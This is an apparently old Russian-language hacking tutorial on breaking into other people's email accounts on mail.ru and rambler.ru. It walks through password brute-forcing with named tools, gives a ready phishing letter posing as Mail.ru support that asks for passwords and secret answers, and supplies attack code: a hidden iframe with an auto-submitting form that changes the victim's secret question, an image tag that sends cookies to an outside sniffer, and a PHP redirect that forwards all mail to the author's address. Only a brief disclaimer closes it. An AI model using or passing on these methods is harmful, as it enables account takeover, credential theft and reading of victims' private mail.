Привет! в этой статье я попытаюсь расказать вам как нужно взламывать мыло. Сделать это можно несколькими способами. Например: Первое - перебором пасса с помошью брутфорса, что не всегда помогает. Второе - можно воспользоваться методами соц . инжинерии . Тут всё зависит от того как грамотно составить ловушку. Нидавно у меня самого угнали мыло этим самым способом . Третий способ - это с помошью html , php , и java скриптов. Очень действенный способ. Всё что нужно сделать в этом способе это отослать скрипт на почту , и после того как жертва прочтёт его мы получаем его кукисы или можно составить такой скрипт чтобы он менял секретный вопрос и ответ на него.Точно так же можно поменять и пароль, но после этого жертва не сможет больше заходить на свою почту и мы не будем получать новые письма , так что лучьше поменять вопрос и узнать пасс. Ну так вот я обьясну каждый из этих способов.
Взлом с помошью Брутфорса.
Ну так вот (для танкистов брутфорсом называется программа которая перебирает пароли) нашим орудием будет S. Tools Xakep . Ну нравится мне эта прога
. Берём её и скачиваем хороший словарь . Если мы знаем имя юзера то создаём текстовый файл с одним единственным именем внутри (это будет логин нашего юзера) . Например я хочу взломать мыло
Support@mail.ru ( конечно мне его не взломать ; =) ) я создал на рабочем столе файл с расширением .txt (для танкистов это делается нажатием правой кнопки мыши ) и назвав его User.txt вписал внутри только Support. Идём к нашей проге и указываем путь к нашему файлу User.txt , после указываем где у нас находится словарь с паролями. Указываем адрес сервера в нашем случае это pop.mail.ru и жмём на кнопку "Начать подбор". После чего ждём .......(все эти операции нужно проводить находясь в инете). Ну что пароль подобрался ? Нет ? У меня тоже
. Ну если пароля нет то ищем другой словарь и пытаемся снова . Можно и без словаря всё это проделать с помошью другой программы например возмём Brutus A2 и в месте где написано Pass Mode ставим Brute Force. Этим самым мы указываем чтобы прога сама перебирала пароли пока не надоест.
Соц. Инженерия.
Сработает этот метод или нет зависит от тебя и от юзера чью почту ты будешь ломать. Во первых тебе нужно уметь общаться с жертвой "без матов" , а покультурнее . С хорошо составленой ловушкой у тебя есть шанс на получение заветного пасса. Например ты можешь написать письмо ламеру с примерно таким содержанием :
Извините за причинённые неудобства , но в связи с тем, что мы переходим на новое оборудование не могли бы вы послать нам на указанный адрес письмо в следующем формате:
1. Примерная дата регистрации
2. Ваше имя
3. Ваш логин
4. Ваш пароль
5. Ответ на ваш секретный вапрос.
Приносим ещё раз свои извинения за причинённые неудобства
Служба технической поддержки Mail.ru
Ну как понравилось письмо ? Ты можешь написать своё письмо главное без ошибок и чтобы юзер поверил тебе. Ну остальные методы социальной инжинерии примерно такие же (путём обшения получаем нужную информацию).
С помошью скриптов.
Способ очень прост . Пишем письмо с таким содержанием:
<iframe src="www.Xakers-zona-soft.narod.ru/lamer.htm" width="11" height="11" style="overflow:hidden;backgroud-color:black;border:none;"frameborder="0">
А из скрипта мы видем что должен запуститься другой скрипт Lamer.htm находяшийся на моём сайте . Его код будет таким :
<form method="post" action="http://www4.nm.ru/chepass.dhtml" name="chpass">
<imput type="hidden" name="cp_msg" value="1">
<imput type="hidden" name="__post" value="1">
<imput type="hidden" name="cp_quest" value="Your Lamer?">
<imput type="hidden" name="cp_answ" value="YES"?>
<imput type="hidden" value="Сохранить" name="Save">
<form>
<script>
document.chpass.submit();
<script>
Здесь мы видим поле где стоит Вопрос и поле с ответом. Отсылаем его юзеру и после того как он его просмотрит то вопрос должен поменяться . И мы можем поменять его пароль на несложный вопрос "You Lamer" , ответив "YES"
.
Так же можно прочитать его почту с помошью снифера. Делается это так. Посылаем письмо такого содержанием:
\x3cimg src="http\x3a//antichat.ru/cgi-bin/s.jpg" name="imaga"\x3e
После этого заходим на
http://www.antichat.ru/sniff/log.php и смотрим логи снифера. Там мы найдём на самом верху (или где нибудь ещё) кукисы злобного юзера и копируем то что нам надо в окошко броузера. И мы у него роемся в почтовом ящике.
Можно так же сделать скрипт чтобы перехватывала все входяшие письма и вместе с отправкой юзеру письмо доставляется и к нам на почту . Скрипт выглядит примерно так:
<?
$adr = "".getenv("HTTP_REFERER")."";
$id = substr("$adr", 31, 36);
$url = "http://mail.rambler.ru/Session/$id/Rules.wssp?Redirect=1&RedirKeep=1&KeepToAndCc=1&RedirectText=xak-shamil@rambler.ru&Update=Сохранить%20изменения";
header("Location: $url");
?>
Этот способ прокатит только на
www.rambler.ru (имеется в виду с использованием этого скрипта). И строка где есть "Update=... "должна писаться в отной строчке (ну можно и так оставить =)). Наш скрипт называется Fuck.php , а значит в письме мы должны писать вот это:
<img src="http://Xakers-zona-soft.narod.ru/Fuck.php">
Результат будет такой что после прочтения этого письма все входяшие письма Ламера будут нашими.
Думаю на этом хватит о взломе почты. Но помните всё что написано в этой статье написано для ознакомления читателя .
Внимание!!!!!
Я не несу никакой ответственности за последствия вызванные после прочтения этой статьи. И ПОМНИТЕ ЧТО ВСЕ ЭТИ ДЕЙСТВИЯ ЗАКОН НЕ ОДОБРЯЕТ ВЕДЬ КАК НИКАК ВЫ ВЛАМЫВАЕТЕСЬ В ЛИЧНУЮ ЖИЗНЬ ЛАМЕРА . ПРЕЖДЕ ЧЕМ ДЕЙСТВОВАТЬ ПОДУМАЙТЕ О ПОСЛЕДСТВИЯХ . ЛУЧШЕ УЧИТЬ ЯЗЫКИ ПРОГРАМИРОВАНИЯ ЧЕМ УНИЧТОЖАТЬ ЧУЖИЕ ДАННЫЕ И ВСЁ ТАКОЕ !!!!!